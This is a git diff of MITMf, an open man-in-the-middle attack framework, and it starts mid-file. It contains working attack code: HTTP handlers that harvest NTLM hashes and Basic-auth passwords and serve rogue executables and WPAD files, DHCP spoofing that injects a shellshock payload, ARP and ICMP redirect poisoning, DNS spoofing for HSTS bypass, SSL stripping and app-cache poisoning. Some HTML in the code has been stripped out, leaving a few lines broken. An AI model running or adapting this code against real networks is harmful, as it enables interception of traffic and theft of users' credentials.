str(self.fields["Av1"])+str(self.fields["Av1Len"])+str(self.fields["Av1Str"])+str(self.fields["Av2"])+str(self.fields["Av2Len"])+str(self.fields["Av2Str"])+str(self.fields["Av3"])+str(self.fields["Av3Len"])+str(self.fields["Av3Str"])+str(self.fields["Av4"])+str(self.fields["Av4Len"])+str(self.fields["Av4Str"])+str(self.fields["Av5"])+str(self.fields["Av5Len"])+str(self.fields["Av5Str"])+str(self.fields["Av6"])+str(self.fields["Av6Len"]) + + # Target Name Offsets + self.fields["TargetNameOffset"] = struct.pack(" 24: + NthashLen = 64 + DomainLen = struct.unpack('2: + PostData = '[+]The HTTP POST DATA in this request was: %s'%(''.join(POSTDATA).strip()) + #print PostData + mitmf_logger.info(PostData) + +#Handle HTTP packet sequence. +def PacketSequence(data,client): + Ntlm = re.findall('(?<=Authorization: NTLM )[^\\r]*', data) + BasicAuth = re.findall('(?<=Authorization: Basic )[^\\r]*', data) + + if ServeEXEOrNot(Exe_On_Off) and re.findall('.exe', data): + File = config.get('HTTP Server', 'ExecFilename') + buffer1 = ServerExeFile(Payload = ServeEXE(data,client,File),filename=File) + buffer1.calculate() + return str(buffer1) + + if ServeEXECAlwaysOrNot(Exec_Mode_On_Off): + if IsExecutable(FILENAME): + buffer1 = ServeAlwaysExeFile(Payload = ServeEXE(data,client,FILENAME),ContentDiFile=FILENAME) + buffer1.calculate() + return str(buffer1) + else: + buffer1 = ServeAlwaysNormalFile(Payload = ServeEXE(data,client,FILENAME)) + buffer1.calculate() + return str(buffer1) + + if Ntlm: + packetNtlm = b64decode(''.join(Ntlm))[8:9] + if packetNtlm == "\x01": + GrabURL(data,client) + GrabCookie(data,client) + r = NTLM_Challenge(ServerChallenge=Challenge) + r.calculate() + t = IIS_NTLM_Challenge_Ans() + t.calculate(str(r)) + buffer1 = str(t) + return buffer1 + if packetNtlm == "\x03": + NTLM_Auth= b64decode(''.join(Ntlm)) + ParseHTTPHash(NTLM_Auth,client) + if WpadForcedAuth(Force_WPAD_Auth) and WpadCustom(data,client): + Message = "[+]WPAD (auth) file sent to: %s"%(client) + if Verbose: + print Message + mitmf_logger.info(Message) + buffer1 = WpadCustom(data,client) + return buffer1 + else: + buffer1 = IIS_Auth_Granted(Payload=HTMLToServe) + buffer1.calculate() + return str(buffer1) + + if BasicAuth: + GrabCookie(data,client) + GrabURL(data,client) + outfile = "./logs/responder/HTTP-Clear-Text-Password-"+client+".txt" + WriteData(outfile,b64decode(''.join(BasicAuth)), b64decode(''.join(BasicAuth))) + mitmf_logger.info('[+]HTTP-User & Password: %s'%(b64decode(''.join(BasicAuth)))) + if WpadForcedAuth(Force_WPAD_Auth) and WpadCustom(data,client): + Message = "[+]WPAD (auth) file sent to: %s"%(client) + if Verbose: + print Message + mitmf_logger.info(Message) + buffer1 = WpadCustom(data,client) + return buffer1 + else: + buffer1 = IIS_Auth_Granted(Payload=HTMLToServe) + buffer1.calculate() + return str(buffer1) + + else: + return str(Basic_Ntlm(Basic)) + +#HTTP Server Class +class HTTP(BaseRequestHandler): + + def handle(self): + try: + while True: + self.request.settimeout(1) + data = self.request.recv(8092) + buff = WpadCustom(data,self.client_address[0]) + if buff and WpadForcedAuth(Force_WPAD_Auth) == False: + Message = "[+]WPAD (no auth) file sent to: %s"%(self.client_address[0]) + if Verbose: + print Message + mitmf_logger.info(Message) + self.request.send(buff) + else: + buffer0 = PacketSequence(data,self.client_address[0]) + self.request.send(buffer0) + except Exception: + pass#No need to be verbose.. + \ No newline at end of file diff --git a/core/responder/wpad/__init__.py b/core/responder/wpad/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/core/sslstrip/ServerConnection.py b/core/sslstrip/ServerConnection.py index d048d6e..0a64cea 100644 --- a/core/sslstrip/ServerConnection.py +++ b/core/sslstrip/ServerConnection.py @@ -93,7 +93,14 @@ class ServerConnection(HTTPClient): elif 'keylog' in self.uri: self.plugins.hook() else: - mitmf_logger.warning("{} {} Data ({}):\n{}".format(self.client.getClientIP(), self.getPostPrefix(), self.headers['host'], self.postData)) + try: + postdata = self.postData.decode('utf8') #Anything that we can't decode to utf-8 isn't worth logging + if len(postdata) > 0: + mitmf_logger.warning("{} {} Data ({}):\n{}".format(self.client.getClientIP(), self.getPostPrefix(), self.headers['host'], postdata)) + except UnicodeDecodeError: + mitmf_logger.debug("[ServerConnection] {} Ignored post data from {}".format(self.client.getClientIP(), self.headers['host'])) + pass + self.transport.write(self.postData) def connectionMade(self): @@ -248,5 +255,3 @@ class ServerConnection(HTTPClient): self.transport.loseConnection() except: pass - - diff --git a/core/sslstrip/URLMonitor.py b/core/sslstrip/URLMonitor.py index 4d632f1..9ef7b78 100644 --- a/core/sslstrip/URLMonitor.py +++ b/core/sslstrip/URLMonitor.py @@ -18,7 +18,7 @@ import re, os import logging -from core.ConfigWatcher import ConfigWatcher +from core.configwatcher import ConfigWatcher mitmf_logger = logging.getLogger('mimtf') diff --git a/core/utils.py b/core/utils.py index 4d83911..059cc61 100644 --- a/core/utils.py +++ b/core/utils.py @@ -20,17 +20,66 @@ # import os -import sys import random import logging +import re +import sys logging.getLogger("scapy.runtime").setLevel(logging.ERROR) #Gets rid of IPV6 Error when importing scapy from scapy.all import get_if_addr, get_if_hwaddr +mitmf_logger = logging.getLogger('mitmf') + +class ImportDir: + #--------------------------------------------------------------------------------------------------- + # http://gitlab.com/aurelien-lourot/importdir + #--------------------------------------------------------------------------------------------------- + + # File name of a module: + __module_file_regexp = "(.+)\.py(c?)$" + + #--------------------------------------------------------------------------------------------------- + # Interface + #--------------------------------------------------------------------------------------------------- + + def do(self, path, env): + """ Imports all modules residing directly in directory "path" into the provided environment + (usually the callers environment). A typical call: + importdir.do("example_dir", globals()) + """ + self.__do(path, env) + + + #--------------------------------------------------------------------------------------------------- + # Implementation + #--------------------------------------------------------------------------------------------------- + + def get_module_names_in_dir(self, path): + """ Returns a set of all module names residing directly in directory "path". + """ + result = set() + + # Looks for all python files in the directory (not recursively) and add their name to result: + for entry in os.listdir(path): + if os.path.isfile(os.path.join(path, entry)): + regexp_result = re.search(self.__module_file_regexp, entry) + if regexp_result: # is a module file name + result.add(regexp_result.groups()[0]) + + return result + + def __do(self, path, env): + """ Implements do(). + """ + sys.path.append(path) # adds provided directory to list we can import from + for module_name in sorted(self.get_module_names_in_dir(path)): # for each found module... + env[module_name] = __import__(module_name) # ... import + class SystemConfig: @staticmethod def setIpForwarding(value): + mitmf_logger.debug("[Utils] Setting ip forwarding to {}".format(value)) with open('/proc/sys/net/ipv4/ip_forward', 'w') as file: file.write(str(value)) file.close() @@ -40,11 +89,11 @@ class SystemConfig: try: ip_address = get_if_addr(interface) if (ip_address == "0.0.0.0") or (ip_address is None): - sys.exit("[-] Interface {} does not have an assigned IP address".format(interface)) + exit("[Utils] Interface {} does not have an assigned IP address".format(interface)) return ip_address except Exception, e: - sys.exit("[-] Error retrieving IP address from {}: {}".format(interface, e)) + exit("[Utils] Error retrieving IP address from {}: {}".format(interface, e)) @staticmethod def getMAC(interface): @@ -52,7 +101,7 @@ class SystemConfig: mac_address = get_if_hwaddr(interface) return mac_address except Exception, e: - sys.exit("[-] Error retrieving MAC address from {}: {}".format(interface, e)) + exit("[Utils] Error retrieving MAC address from {}: {}".format(interface, e)) class IpTables: @@ -70,15 +119,18 @@ class IpTables: return IpTables._instance def Flush(self): + mitmf_logger.debug("[Utils] Flushing iptables") os.system('iptables -F && iptables -X && iptables -t nat -F && iptables -t nat -X') self.dns = False self.http = False def HTTP(self, http_redir_port): + mitmf_logger.debug("[Utils] Setting iptables HTTP redirection rule from port 80 to {}".format(http_redir_port)) os.system('iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port {}'.format(http_redir_port)) self.http = True def DNS(self, ip, port): + mitmf_logger.debug("[Utils] Setting iptables DNS redirection rule from port 53 to {}:{}".format(ip, port)) os.system('iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to {}:{}'.format(ip, port)) self.dns = True diff --git a/core/wrappers/protocols.py b/core/wrappers/protocols.py deleted file mode 100644 index 1dc17a5..0000000 --- a/core/wrappers/protocols.py +++ /dev/null @@ -1,378 +0,0 @@ -#!/usr/bin/env python2.7 - -# Copyright (c) 2014-2016 Marcello Salvati -# -# This program is free software; you can redistribute it and/or -# modify it under the terms of the GNU General Public License as -# published by the Free Software Foundation; either version 3 of the -# License, or (at your option) any later version. -# -# This program is distributed in the hope that it will be useful, but -# WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with this program; if not, write to the Free Software -# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 -# USA -# - -import logging -import threading -import binascii -import random -#import dns.resolver - -from base64 import b64decode -from urllib import unquote -from time import sleep -#from netfilterqueue import NetfilterQueue - -logging.getLogger("scapy.runtime").setLevel(logging.ERROR) #Gets rid of IPV6 Error when importing scapy -from scapy.all import * - -mitmf_logger = logging.getLogger('mitmf') - -class _DHCP(): - - def __init__(self, interface, dhcpcfg, ip, mac): - self.interface = interface - self.ip_address = ip - self.mac_address = mac - self.shellshock = None - self.debug = False - self.dhcpcfg = dhcpcfg - self.rand_number = [] - self.dhcp_dic = {} - - def start(self): - t = threading.Thread(name="dhcp_spoof", target=self.dhcp_sniff, args=(self.interface,)) - t.setDaemon(True) - t.start() - - def dhcp_sniff(self, interface): - sniff(filter="udp and (port 67 or 68)", prn=self.dhcp_callback, iface=interface) - - def dhcp_rand_ip(self): - pool = self.dhcpcfg['ip_pool'].split('-') - trunc_ip = pool[0].split('.'); del(trunc_ip[3]) - max_range = int(pool[1]) - min_range = int(pool[0].split('.')[3]) - number_range = range(min_range, max_range) - for n in number_range: - if n in self.rand_number: - number_range.remove(n) - rand_number = random.choice(number_range) - self.rand_number.append(rand_number) - rand_ip = '.'.join(trunc_ip) + '.' + str(rand_number) - - return rand_ip - - def dhcp_callback(self, resp): - if resp.haslayer(DHCP): - xid = resp[BOOTP].xid - mac_addr = resp[Ether].src - raw_mac = binascii.unhexlify(mac_addr.replace(":", "")) - if xid in self.dhcp_dic.keys(): - client_ip = self.dhcp_dic[xid] - else: - client_ip = self.dhcp_rand_ip() - self.dhcp_dic[xid] = client_ip - - if resp[DHCP].options[0][1] is 1: - mitmf_logger.info("Got DHCP DISCOVER from: " + mac_addr + " xid: " + hex(xid)) - mitmf_logger.info("Sending DHCP OFFER") - packet = (Ether(src=self.mac_address, dst='ff:ff:ff:ff:ff:ff') / - IP(src=self.ip_address, dst='255.255.255.255') / - UDP(sport=67, dport=68) / - BOOTP(op='BOOTREPLY', chaddr=raw_mac, yiaddr=client_ip, siaddr=self.ip_address, xid=xid) / - DHCP(options=[("message-type", "offer"), - ('server_id', self.ip_address), - ('subnet_mask', self.dhcpcfg['subnet']), - ('router', self.ip_address), - ('lease_time', 172800), - ('renewal_time', 86400), - ('rebinding_time', 138240), - "end"])) - - try: - packet[DHCP].options.append(tuple(('name_server', self.dhcpcfg['dns_server']))) - except KeyError: - pass - - sendp(packet, iface=self.interface, verbose=self.debug) - - if resp[DHCP].options[0][1] is 3: - mitmf_logger.info("Got DHCP REQUEST from: " + mac_addr + " xid: " + hex(xid)) - packet = (Ether(src=self.mac_address, dst='ff:ff:ff:ff:ff:ff') / - IP(src=self.ip_address, dst='255.255.255.255') / - UDP(sport=67, dport=68) / - BOOTP(op='BOOTREPLY', chaddr=raw_mac, yiaddr=client_ip, siaddr=self.ip_address, xid=xid) / - DHCP(options=[("message-type", "ack"), - ('server_id', self.ip_address), - ('subnet_mask', self.dhcpcfg['subnet']), - ('router', self.ip_address), - ('lease_time', 172800), - ('renewal_time', 86400), - ('rebinding_time', 138240)])) - - try: - packet[DHCP].options.append(tuple(('name_server', self.dhcpcfg['dns_server']))) - except KeyError: - pass - - if self.shellshock: - mitmf_logger.info("Sending DHCP ACK with shellshock payload") - packet[DHCP].options.append(tuple((114, "() { ignored;}; " + self.shellshock))) - packet[DHCP].options.append("end") - else: - mitmf_logger.info("Sending DHCP ACK") - packet[DHCP].options.append("end") - - sendp(packet, iface=self.interface, verbose=self.debug) - -class _ARP(): - - def __init__(self, gateway, interface, mac): - - self.gateway = gateway - self.gatewaymac = getmacbyip(gateway) - self.mac = mac - self.target = None - self.targetmac = None - self.interface = interface - self.arpmode = 'req' - self.debug = False - self.send = True - self.arp_inter = 3 - - def start(self): - if self.gatewaymac is None: - sys.exit("[-] Error: Could not resolve gateway's MAC address") - - if self.target: - self.targetmac = getmacbyip(self.target) - if self.targetmac is None: - sys.exit("[-] Error: Could not resolve target's MAC address") - - if self.arpmode == 'req': - pkt = self.build_arp_req() - - elif self.arpmode == 'rep': - pkt = self.build_arp_rep() - - t = threading.Thread(name='arp_spoof', target=self.send_arps, args=(pkt, self.interface, self.debug,)) - t.setDaemon(True) - t.start() - - def send_arps(self, pkt, interface, debug): - while self.send: - sendp(pkt, inter=self.arp_inter, iface=interface, verbose=debug) - - def stop(self): - self.send = False - sleep(3) - self.arp_inter = 1 - - if self.target: - print "\n[*] Re-ARPing target" - self.reARP_target(5) - - print "\n[*] Re-ARPing network" - self.reARP_net(5) - - def build_arp_req(self): - if self.target is None: - pkt = Ether(src=self.mac, dst='ff:ff:ff:ff:ff:ff')/ARP(hwsrc=self.mac, psrc=self.gateway, pdst=self.gateway) - elif self.target: - pkt = Ether(src=self.mac, dst=self.targetmac)/\ - ARP(hwsrc=self.mac, psrc=self.gateway, hwdst=self.targetmac, pdst=self.target) - - return pkt - - def build_arp_rep(self): - if self.target is None: - pkt = Ether(src=self.mac, dst='ff:ff:ff:ff:ff:ff')/ARP(hwsrc=self.mac, psrc=self.gateway, op=2) - elif self.target: - pkt = Ether(src=self.mac, dst=self.targetmac)/\ - ARP(hwsrc=self.mac, psrc=self.gateway, hwdst=self.targetmac, pdst=self.target, op=2) - - return pkt - - def reARP_net(self, count): - pkt = Ether(src=self.gatewaymac, dst='ff:ff:ff:ff:ff:ff')/\ - ARP(psrc=self.gateway, hwsrc=self.gatewaymac, op=2) - - sendp(pkt, inter=self.arp_inter, count=count, iface=self.interface) - - def reARP_target(self, count): - pkt = Ether(src=self.gatewaymac, dst='ff:ff:ff:ff:ff:ff')/\ - ARP(psrc=self.target, hwsrc=self.targetmac, op=2) - - sendp(pkt, inter=self.arp_inter, count=count, iface=self.interface) - -class _ICMP(): - - def __init__(self, interface, target, gateway, ip_address): - - self.target = target - self.gateway = gateway - self.interface = interface - self.ip_address = ip_address - self.debug = False - self.send = True - self.icmp_interval = 2 - - def build_icmp(self): - pkt = IP(src=self.gateway, dst=self.target)/ICMP(type=5, code=1, gw=self.ip_address) /\ - IP(src=self.target, dst=self.gateway)/UDP() - - return pkt - - def start(self): - pkt = self.build_icmp() - - t = threading.Thread(name='icmp_spoof', target=self.send_icmps, args=(pkt, self.interface, self.debug,)) - t.setDaemon(True) - t.start() - - def stop(self): - self.send = False - sleep(3) - - def send_icmps(self, pkt, interface, debug): - while self.send: - sendp(pkt, inter=self.icmp_interval, iface=interface, verbose=debug) - -""" -class _DNS(): - - hsts = False - dns = False - hstscfg = None - dnscfg = None - _instance = None - nfqueue = None - queue_number = 0 - - def __init__(self): - self.nfqueue = NetfilterQueue() - t = threading.Thread(name='nfqueue', target=self.bind, args=()) - t.setDaemon(True) - t.start() - - @staticmethod - def getInstance(): - if _DNS._instance is None: - _DNS._instance = _DNS() - - return _DNS._instance - - @staticmethod - def checkInstance(): - if _DNS._instance is None: - return False - else: - return True - - def bind(self): - self.nfqueue.bind(self.queue_number, self.callback) - self.nfqueue.run() - - def stop(self): - try: - self.nfqueue.unbind() - except: - pass - - def enableHSTS(self, config): - self.hsts = True - self.hstscfg = config - - def enableDNS(self, config): - self.dns = True - self.dnscfg = config - - def resolve_domain(self, domain): - try: - mitmf_logger.debug("Resolving -> %s" % domain) - answer = dns.resolver.query(domain, 'A') - real_ips = [] - for rdata in answer: - real_ips.append(rdata.address) - - if len(real_ips) > 0: - return real_ips - - except Exception: - mitmf_logger.info("Error resolving " + domain) - - def callback(self, payload): - try: - #mitmf_logger.debug(payload) - pkt = IP(payload.get_payload()) - - if not pkt.haslayer(DNSQR): - payload.accept() - return - - if pkt.haslayer(DNSQR): - mitmf_logger.debug("Got DNS packet for %s %s" % (pkt[DNSQR].qname, pkt[DNSQR].qtype)) - if self.dns: - for k, v in self.dnscfg.items(): - if k in pkt[DNSQR].qname: - self.modify_dns(payload, pkt, v) - return - - payload.accept() - - elif self.hsts: - if (pkt[DNSQR].qtype is 28 or pkt[DNSQR].qtype is 1): - for k,v in self.hstscfg.items(): - if v == pkt[DNSQR].qname[:-1]: - ip = self.resolve_domain(k) - if ip: - self.modify_dns(payload, pkt, ip) - return - - if 'wwww' in pkt[DNSQR].qname: - ip = self.resolve_domain(pkt[DNSQR].qname[1:-1]) - if ip: - self.modify_dns(payload, pkt, ip) - return - - if 'web' in pkt[DNSQR].qname: - ip = self.resolve_domain(pkt[DNSQR].qname[3:-1]) - if ip: - self.modify_dns(payload, pkt, ip) - return - - payload.accept() - - except Exception, e: - print "Exception occurred in nfqueue callback: " + str(e) - - def modify_dns(self, payload, pkt, ip): - try: - spoofed_pkt = IP(dst=pkt[IP].src, src=pkt[IP].dst) /\ - UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport) /\ - DNS(id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd) - - if self.hsts: - spoofed_pkt[DNS].an = DNSRR(rrname=pkt[DNS].qd.qname, ttl=1800, rdata=ip[0]); del ip[0] #have to do this first to initialize the an field - for i in ip: - spoofed_pkt[DNS].an.add_payload(DNSRR(rrname=pkt[DNS].qd.qname, ttl=1800, rdata=i)) - mitmf_logger.info("%s Resolving %s for HSTS bypass (DNS)" % (pkt[IP].src, pkt[DNSQR].qname[:-1])) - payload.set_payload(str(spoofed_pkt)) - payload.accept() - - if self.dns: - spoofed_pkt[DNS].an = DNSRR(rrname=pkt[DNS].qd.qname, ttl=1800, rdata=ip) - mitmf_logger.info("%s Modified DNS packet for %s" % (pkt[IP].src, pkt[DNSQR].qname[:-1])) - payload.set_payload(str(spoofed_pkt)) - payload.accept() - - except Exception, e: - print "Exception occurred while modifying DNS: " + str(e) -""" \ No newline at end of file diff --git a/libs/bdfactory b/libs/bdfactory index e6af51b..4609ade 160000 --- a/libs/bdfactory +++ b/libs/bdfactory @@ -1 +1 @@ -Subproject commit e6af51b0c921e7c3dd5bb10a0d7b3983f46ca32b +Subproject commit 4609adeb5383135352aa27113d8ee1398aecff99 diff --git a/libs/responder b/libs/responder deleted file mode 160000 index fe4eab5..0000000 --- a/libs/responder +++ /dev/null @@ -1 +0,0 @@ -Subproject commit fe4eab580de4ba89d82c16d88670c72c712c332a diff --git a/mitmf.py b/mitmf.py index 97bedfe..6c773c3 100755 --- a/mitmf.py +++ b/mitmf.py @@ -18,53 +18,46 @@ # USA # -import sys import argparse +import sys import os import logging +import threading +import user_agents from twisted.web import http from twisted.internet import reactor from core.sslstrip.CookieCleaner import CookieCleaner from core.sergioproxy.ProxyPlugins import ProxyPlugins -from core.utils import Banners -from core.configwatcher import ConfigWatcher - +from core.utils import Banners, SystemConfig from plugins import * -try: - import user_agents -except ImportError: - print "[-] user_agents library missing! User-Agent parsing will be disabled!" - -mitmf_version = "0.9.6-dev" -sslstrip_version = "0.9" -sergio_version = "0.2.1" -dnschef_version = "0.4" - Banners().printBanner() if os.geteuid() != 0: sys.exit("[-] When man-in-the-middle you want, run as r00t you will, hmm?") -parser = argparse.ArgumentParser(description="MITMf v{} - Framework for MITM attacks".format(mitmf_version), version=mitmf_version, usage='', epilog="Use wisely, young Padawan.",fromfile_prefix_chars='@') +mitmf_version = "0.9.7" +sslstrip_version = "0.9" +sergio_version = "0.2.1" +dnschef_version = "0.4" +netcreds_version = "1.0" + +parser = argparse.ArgumentParser(description="MITMf v{} - Framework for MITM attacks".format(mitmf_version), version=mitmf_version, usage='mitmf.py -i interface [mitmf options] [plugin name] [plugin options]', epilog="Use wisely, young Padawan.",fromfile_prefix_chars='@') + #add MITMf options mgroup = parser.add_argument_group("MITMf", "Options for MITMf") mgroup.add_argument("--log-level", type=str,choices=['debug', 'info'], default="info", help="Specify a log level [default: info]") mgroup.add_argument("-i", "--interface", required=True, type=str, metavar="interface" ,help="Interface to listen on") mgroup.add_argument("-c", "--config-file", dest='configfile', type=str, default="./config/mitmf.conf", metavar='configfile', help="Specify config file to use") -mgroup.add_argument('-d', '--disable-proxy', dest='disproxy', action='store_true', default=False, help='Only run plugins, disable all proxies') -#added by alexander.georgiev@daloo.de mgroup.add_argument('-m', '--manual-iptables', dest='manualiptables', action='store_true', default=False, help='Do not setup iptables or flush them automatically') #add sslstrip options sgroup = parser.add_argument_group("SSLstrip", "Options for SSLstrip library") -#sgroup.add_argument("-w", "--write", type=argparse.FileType('w'), metavar="filename", default=sys.stdout, help="Specify file to log to (stdout by default).") slogopts = sgroup.add_mutually_exclusive_group() slogopts.add_argument("-p", "--post", action="store_true",help="Log only SSL POSTs. (default)") slogopts.add_argument("-s", "--ssl", action="store_true", help="Log all SSL traffic to and from server.") slogopts.add_argument("-a", "--all", action="store_true", help="Log all SSL and HTTP traffic to and from server.") -#slogopts.add_argument("-c", "--clients", action='store_true', default=False, help='Log each clients data in a seperate file') #not fully tested yet sgroup.add_argument("-l", "--listen", type=int, metavar="port", default=10000, help="Port to listen on (default 10000)") sgroup.add_argument("-f", "--favicon", action="store_true", help="Substitute a lock favicon on secure requests.") sgroup.add_argument("-k", "--killsessions", action="store_true", help="Kill sessions in progress.") @@ -76,8 +69,8 @@ plugins = [] try: for p in plugin_classes: plugins.append(p()) -except: - print "Failed to load plugin class {}".format(p) +except Exception, e: + print "[-] Failed to load plugin class {}: {}".format(p, e) #Give subgroup to each plugin with options try: @@ -94,28 +87,36 @@ try: except NotImplementedError: sys.exit("[-] {} plugin claimed option support, but didn't have it.".format(p.name)) +if len(sys.argv) is 1: + parser.print_help() + sys.exit(1) + args = parser.parse_args() -log_level = logging.__dict__[args.log_level.upper()] +#first check to see if we supplied a valid interface +myip = SystemConfig.getIP(args.interface) +mymac = SystemConfig.getMAC(args.interface) #Start logging +log_level = logging.__dict__[args.log_level.upper()] + logging.basicConfig(level=log_level, format="%(asctime)s %(message)s", datefmt="%Y-%m-%d %H:%M:%S") logFormatter = logging.Formatter("%(asctime)s %(message)s", datefmt="%Y-%m-%d %H:%M:%S") mitmf_logger = logging.getLogger('mitmf') - fileHandler = logging.FileHandler("./logs/mitmf.log") fileHandler.setFormatter(logFormatter) mitmf_logger.addHandler(fileHandler) ##################################################################################################### -#All our options should be loaded now, pass them onto plugins +#All our options should be loaded now, initialize the plugins print "[*] MITMf v{} online... initializing plugins".format(mitmf_version) load = [] for p in plugins: + #load only the plugins that have been called at the command line if vars(args)[p.optname] is True: print "|_ {} v{}".format(p.name, p.version) @@ -125,48 +126,56 @@ for p in plugins: p.tree_output.remove(line) p.initialize(args) - load.append(p) if hasattr(p, 'tree_output') and p.tree_output: for line in p.tree_output: print "| |_ {}".format(line) -#Plugins are ready to go, start MITMf -if args.disproxy: - ProxyPlugins.getInstance().setPlugins(load) - DNSChef.getInstance().start() -else: - from core.sslstrip.StrippingProxy import StrippingProxy - from core.sslstrip.URLMonitor import URLMonitor - from core.dnschef.dnschef import DNSChef + load.append(p) - URLMonitor.getInstance().setFaviconSpoofing(args.favicon) +#Plugins are ready to go, let's rock & roll +from core.sslstrip.StrippingProxy import StrippingProxy +from core.sslstrip.URLMonitor import URLMonitor + +URLMonitor.getInstance().setFaviconSpoofing(args.favicon) + +CookieCleaner.getInstance().setEnabled(args.killsessions) +ProxyPlugins.getInstance().setPlugins(load) + +strippingFactory = http.HTTPFactory(timeout=10) +strippingFactory.protocol = StrippingProxy + +reactor.listenTCP(args.listen, strippingFactory) + +for p in load: - DNSChef.getInstance().start() + p.pluginReactor(strippingFactory) #we pass the default strippingFactory, so the plugins can use it + p.startConfigWatch() - CookieCleaner.getInstance().setEnabled(args.killsessions) - ProxyPlugins.getInstance().setPlugins(load) + t = threading.Thread(name='{}-thread'.format(p.name), target=p.startThread, args=(args,)) + t.setDaemon(True) + t.start() - strippingFactory = http.HTTPFactory(timeout=10) - strippingFactory.protocol = StrippingProxy +print "|" +print "|_ Sergio-Proxy v{} online".format(sergio_version) +print "|_ SSLstrip v{} by Moxie Marlinspike online".format(sslstrip_version) - reactor.listenTCP(args.listen, strippingFactory) +#Start Net-Creds +from core.netcreds.NetCreds import NetCreds +NetCreds().start(args.interface, myip) +print "|_ Net-Creds v{} online".format(netcreds_version) - #load custom reactor options for plugins that have the 'plugin_reactor' attribute - for p in load: - if hasattr(p, 'plugin_reactor'): - p.plugin_reactor(strippingFactory) #we pass the default strippingFactory, so the plugins can use it +#Start all servers! +from core.dnschef.DNSchef import DNSChef +DNSChef.getInstance().start() +print "|_ DNSChef v{} online\n".format(dnschef_version) - if hasattr(p, 'startConfigWatch'): - p.startConfigWatch() - - print "|" - print "|_ Sergio-Proxy v{} online".format(sergio_version) - print "|_ SSLstrip v{} by Moxie Marlinspike online".format(sslstrip_version) - print "|_ DNSChef v{} online\n".format(dnschef_version) +from core.protocols.smb.SMBserver import SMBserver +SMBserver().start() +#start the reactor reactor.run() #run each plugins finish() on exit for p in load: - p.finish() \ No newline at end of file + p.finish() diff --git a/plugins/AppCachePoison.py b/plugins/AppCachePoison.py deleted file mode 100644 index 8d81dc8..0000000 --- a/plugins/AppCachePoison.py +++ /dev/null @@ -1,207 +0,0 @@ -#!/usr/bin/env python2.7 - -# Copyright (c) 2014-2016 Marcello Salvati -# -# This program is free software; you can redistribute it and/or -# modify it under the terms of the GNU General Public License as -# published by the Free Software Foundation; either version 3 of the -# License, or (at your option) any later version. -# -# This program is distributed in the hope that it will be useful, but -# WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with this program; if not, write to the Free Software -# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 -# USA -# - -# 99.9999999% of this code was stolen from https://github.com/koto/sslstrip by Krzysztof Kotowicz - -import logging -import re -import os.path -import time -import sys - -from plugins.plugin import Plugin -from datetime import date -from core.sslstrip.URLMonitor import URLMonitor -from core.configwatcher import ConfigWatcher - -mitmf_logger = logging.getLogger('mitmf') - -class AppCachePlugin(Plugin): - name = "App Cache Poison" - optname = "appoison" - desc = "Performs App Cache Poisoning attacks" - implements = ["handleResponse"] - version = "0.3" - has_opts = False - - def initialize(self, options): - self.options = options - self.mass_poisoned_browsers = [] - self.urlMonitor = URLMonitor.getInstance() - - self.urlMonitor.setAppCachePoisoning() - - def handleResponse(self, request, data): - - self.config = ConfigWatcher.getInstance().getConfig()['AppCachePoison'] # so we reload the config on each request - url = request.client.uri - req_headers = request.client.getAllHeaders() - headers = request.client.responseHeaders - ip = request.client.getClientIP() - - ######################################################################### - - if "enable_only_in_useragents" in self.config: - regexp = self.config["enable_only_in_useragents"] - if regexp and not re.search(regexp,req_headers["user-agent"]): - mitmf_logger.info("%s Tampering disabled in this useragent (%s)" % (ip, req_headers["user-agent"])) - return {'request': request, 'data': data} - - urls = self.urlMonitor.getRedirectionSet(url) - mitmf_logger.debug("%s [AppCachePoison] Got redirection set: %s" % (ip, urls)) - (name,s,element,url) = self.getSectionForUrls(urls) - - if s is False: - data = self.tryMassPoison(url, data, headers, req_headers, ip) - return {'request': request, 'data': data} - - mitmf_logger.info("%s Found URL %s in section %s" % (ip, url, name)) - p = self.getTemplatePrefix(s) - - if element == 'tamper': - mitmf_logger.info("%s Poisoning tamper URL with template %s" % (ip, p)) - if os.path.exists(p + '.replace'): # replace whole content - f = open(p + '.replace','r') - data = self.decorate(f.read(), s) - f.close() - - elif os.path.exists(p + '.append'): # append file to body - f = open(p + '.append','r') - appendix = self.decorate(f.read(), s) - f.close() - # append to body - data = re.sub(re.compile("",re.IGNORECASE),appendix + "", data) - - # add manifest reference - data = re.sub(re.compile("",re.IGNORECASE),appendix + "", data) - self.mass_poisoned_browsers.append(browser_id) # mark to avoid mass spoofing for this ip - return data - - def getMassPoisonHtml(self): - html = "
" - for i in self.config: - if isinstance(self.config[i], dict): - if self.config[i].has_key('tamper_url') and not self.config[i].get('skip_in_mass_poison', False): - html += "" - - return html + "
" - - def cacheForFuture(self, headers): - ten_years = 315569260 - headers.setRawHeaders("Cache-Control",["max-age="+str(ten_years)]) - headers.setRawHeaders("Last-Modified",["Mon, 29 Jun 1998 02:28:12 GMT"]) # it was modifed long ago, so is most likely fresh - in_ten_years = date.fromtimestamp(time.time() + ten_years) - headers.setRawHeaders("Expires",[in_ten_years.strftime("%a, %d %b %Y %H:%M:%S GMT")]) - - def removeDangerousHeaders(self, headers): - headers.removeHeader("X-Frame-Options") - - def getSpoofedManifest(self, url, section): - p = self.getTemplatePrefix(section) - if not os.path.exists(p+'.manifest'): - p = self.getDefaultTemplatePrefix() - - f = open(p + '.manifest', 'r') - manifest = f.read() - f.close() - return self.decorate(manifest, section) - - def decorate(self, content, section): - for i in section: - content = content.replace("%%"+i+"%%", section[i]) - return content - - def getTemplatePrefix(self, section): - if section.has_key('templates'): - return self.config['templates_path'] + '/' + section['templates'] - - return self.getDefaultTemplatePrefix() - - def getDefaultTemplatePrefix(self): - return self.config['templates_path'] + '/default' - - def getManifestUrl(self, section): - return section.get("manifest_url",'/robots.txt') - - def getSectionForUrls(self, urls): - for url in urls: - for i in self.config: - if isinstance(self.config[i], dict): #section - section = self.config[i] - 